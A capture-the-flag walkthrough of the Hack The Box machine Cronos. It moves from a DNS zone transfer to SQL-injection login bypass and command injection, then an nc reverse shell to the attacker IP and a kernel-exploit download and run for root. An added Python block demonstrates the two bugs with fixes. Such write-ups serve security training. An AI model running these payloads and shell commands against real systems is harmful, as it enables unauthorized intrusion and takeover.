
Cronos -- hack the box

Introduction

Target machine: 10.10.10.13 (OS: Linux)

Kali Linux: 10.10.16.44

Enumeration

Firstly, detect the open ports:

nmap -sT -p- --min-rate 10000 -oA openports 10.10.10.13

3 ports are open; detect the detailed services:

nmap -sV -sC -p22,53,80 -Pn -oA services 10.10.10.13

So the relation between ports and services is as follows:

port    service
53      DNS
22      ssh
80      http

Exploitation

http

As the target machine provides an http service, try to access http://10.10.10.13.

It is the default Apache web page, nothing new. So try to brute force directories on http://10.10.10.13/ with dirbuster. After brute forcing for a while, nothing new is found.

DNS

As the target machine runs a DNS service, it is common to check for zone transfer with dig. We can guess that the DNS domain is cronos.htb, so a zone transfer can be checked by:

dig axfr @10.10.10.13 cronos.htb

An interesting domain name admin.cronos.htb is found. So add an entry to /etc/hosts:

10.10.10.13    admin.cronos.htb

Try to access admin.cronos.htb in the browser; a login web page is displayed. Yep, it is what we want. It seems that the login is quite simple. Try to log in with SQL injection, using the username admin' or '1' = '1; the password can be anything.

Magic! We are in. It seems to be a network tool. However, it has exposed the ability to execute commands remotely. Have a test with 8888&whoami:

The result is www-data. Obviously, the command is executed properly. Now try to get a reverse shell. Listen on port 1234 with nc on our Kali:

nc -lvnp 1234

Then use the bash reverse shell command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.44 1234 >/tmp/f

Wait for several seconds and the shell is returned. Wonderful!

Try to obtain a tty terminal:

python -c "import pty;pty.spawn('/bin/sh')"

Obviously, the user role is obtained. Go to the home folder and ls, then go into the user folder to get user.txt.
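Looking back at the two application bugs used above, the login bypass with admin' or '1' = '1 and the command injection with 8888&whoami, here is an added example (not code from the original writeup or from the box itself) that reproduces each bug beside its fix. The table schema, the sample user row, the password and all function names are constructed for the demonstration.

```python
"""Added example (not from the original writeup). Two constructed snippets
mirror the two application bugs used on admin.cronos.htb: the SQL-injection
login bypass and the command injection in the network tool, each beside the
fix. Schema, user row and function names are all made up here."""
import ipaddress
import re
import sqlite3

PAYLOAD_SQLI = "admin' or '1' = '1"   # username used in the writeup
PAYLOAD_CMDI = "8888&whoami"          # input used in the writeup


def make_db():
    # Constructed sample database: one admin user with a made-up password.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return conn

def login_vulnerable(conn, username, password):
    # The username is spliced into the SQL text, so the quote in the
    # payload closes the string and "or '1' = '1" rewrites the WHERE clause.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, username, password):
    # Bound parameters are compared as data, never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

def ping_argv(target):
    # Hardened version of the "network tool": accept only an IP address or a
    # plain hostname, then build an argv list so no shell ever sees the input.
    # '8888&whoami' is rejected before anything would be executed.
    try:
        ipaddress.ip_address(target)
    except ValueError:
        if not re.fullmatch(r"[A-Za-z0-9.-]{1,253}", target):
            raise ValueError("invalid target: %r" % target)
    return ["ping", "-c", "1", target]  # run via subprocess.run(argv), no shell=True

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, PAYLOAD_SQLI, "anything"))  # True: bypass works
    print(login_safe(db, PAYLOAD_SQLI, "anything"))        # False
    print(ping_argv("10.10.10.13"))
```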

Privilege escalation

It's time to get the root role. Check the kernel of the target machine:

uname -a

Google linux kernel privilege escalation to find a payload.

Save the payload as exploit.c and start an HTTP server to serve it:

python -m SimpleHTTPServer 80

There are several ways to provide HTTP file services, including PHP, Apache, Python, etc. Python is quite convenient. Then download exploit.c on the target machine:

wget http://10.10.16.22/exploit.c

Then try to compile it with gcc. Oops, gcc seems not to be installed on the target machine. In general, a Linux box will have gcc installed. Whatever, compile exploit.c on Kali instead:

gcc exploit.c -o exploit

Remember to download the file into a folder with write permission, such as /tmp:

cd /tmp
wget http://10.10.16.44/exploit

Make sure it has execute permission:

chmod +x exploit

Just execute it with ./exploit. Wow, now check whoami.

Conclusion

The target machine is quite straightforward. The key point is exploiting the DNS zone transfer. The other steps are not difficult with basic knowledge, including SQL injection, reverse shell, etc.

This article is shared from the WeChat official account madMen (mad_coder); author: madneal.

Original publication date: 2019-03-15
